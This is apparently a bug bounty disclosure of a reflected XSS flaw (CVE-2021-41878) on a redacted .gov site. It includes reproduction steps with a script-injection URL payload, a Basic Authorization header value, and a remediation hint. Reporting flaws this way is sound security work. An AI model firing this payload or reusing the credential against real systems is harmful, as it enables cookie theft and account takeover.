Hi team,
I was able to execute XSS on ███████.gov
Steps to produce -
1 -Turn on the burp intercepter
2- Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3- In Intercepter add the following Headers
Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1
4- when you send this GET request you will receive a response with XSS payload executed.
An attacker can send the malicious link to victims and steals victims’ cookie leading to account takeover.
CVE-2021-41878
I have attached the Video POC, please check it out.
sanitize the inputs in the URL